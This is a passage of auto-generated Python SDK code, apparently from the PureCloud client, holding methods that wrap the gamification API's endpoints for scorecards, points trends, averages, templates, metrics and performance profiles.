all_params = ['user_id', 'start_workday', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_attendance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_attendance`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_attendance`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_attendance`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/attendance'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttendanceStatusListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_bestpoints(self, user_id, **kwargs):
"""
Best points of a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_bestpoints(user_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:return: UserBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_bestpoints" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_bestpoints`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/bestpoints'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_points_alltime(self, user_id, end_workday, **kwargs):
"""
All-time points for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_points_alltime(user_id, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AllTimePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_points_alltime" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_points_alltime`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_points_alltime`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/points/alltime'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AllTimePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_points_trends(self, user_id, start_workday, end_workday, **kwargs):
"""
Points trend for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_points_trends(user_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str day_of_week: Optional filter to specify which day of weeks to be included in the response
:return: WorkdayPointsTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'start_workday', 'end_workday', 'day_of_week']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_points_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_points_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_points_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_points_trends`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/points/trends'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'day_of_week' in params:
query_params['dayOfWeek'] = params['day_of_week']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayPointsTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_values_trends(self, user_id, start_workday, end_workday, **kwargs):
"""
Values Trends of a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_values_trends(user_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'start_workday', 'end_workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_values_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_values_trends`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/values/trends'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_points_average(self, filter_type, filter_id, workday, **kwargs):
"""
Workday average points by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_points_average(filter_type, filter_id, workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. (required)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: SingleWorkdayAveragePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_points_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_points_average`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_points_average`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_users_points_average`")
resource_path = '/api/v2/gamification/scorecards/users/points/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'workday' in params:
query_params['workday'] = params['workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAveragePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_values_average(self, filter_type, filter_id, workday, **kwargs):
"""
Workday average values by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_values_average(filter_type, filter_id, workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: SingleWorkdayAverageValues
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_values_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_values_average`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_values_average`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_users_values_average`")
resource_path = '/api/v2/gamification/scorecards/users/values/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'workday' in params:
query_params['workday'] = params['workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAverageValues',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_values_trends(self, filter_type, filter_id, start_workday, end_workday, **kwargs):
"""
Values trend by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_values_trends(filter_type, filter_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'start_workday', 'end_workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_users_values_trends`")
resource_path = '/api/v2/gamification/scorecards/users/values/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_values_average(self, workday, **kwargs):
"""
Average values of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_values_average(workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: SingleWorkdayAverageValues
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_values_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_values_average`")
resource_path = '/api/v2/gamification/scorecards/values/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAverageValues',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_values_trends(self, start_workday, end_workday, **kwargs):
"""
Values trends of the requesting user or group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_values_trends(start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str filter_type: Filter type for the query request. If not set, then the request is for the requesting user.
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'filter_type', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_values_trends`")
resource_path = '/api/v2/gamification/scorecards/values/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_status(self, **kwargs):
"""
Gamification activation status
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_status(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GamificationStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_status" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GamificationStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_template(self, template_id, **kwargs):
"""
Objective template by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_template(template_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str template_id: template id (required)
:return: ObjectiveTemplate
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['template_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'template_id' is set
if ('template_id' not in params) or (params['template_id'] is None):
raise ValueError("Missing the required parameter `template_id` when calling `get_gamification_template`")
resource_path = '/api/v2/gamification/templates/{templateId}'.replace('{format}', 'json')
path_params = {}
if 'template_id' in params:
path_params['templateId'] = params['template_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectiveTemplate',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_templates(self, **kwargs):
"""
All objective templates
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_templates(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetTemplatesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_templates" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/templates'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetTemplatesResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_gamification_metrics(self, body, **kwargs):
"""
Creates a gamified metric with a given metric definition and metric objective
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_gamification_metrics(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Metric body: Metric (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_gamification_metrics" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_gamification_metrics`")
resource_path = '/api/v2/gamification/metrics'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_metric(self, metric_id, body, **kwargs):
"""
Updates a metric
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_metric(metric_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_id: metric Id (required)
:param Metric body: Metric (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_metric" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_id' is set
if ('metric_id' not in params) or (params['metric_id'] is None):
raise ValueError("Missing the required parameter `metric_id` when calling `put_gamification_metric`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_gamification_metric`")
resource_path = '/api/v2/gamification/metrics/{metricId}'.replace('{format}', 'json')
path_params = {}
if 'metric_id' in params:
path_params['metricId'] = params['metric_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_profile(self, performance_profile_id, **kwargs):
"""
Updates a performance profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_profile(performance_profile_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: Performance Profile Id (required)
:param PerformanceProfile body: performanceProfile
:return: PerformanceProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_profile" % key
)
params[key] = val
del params['kwargs']
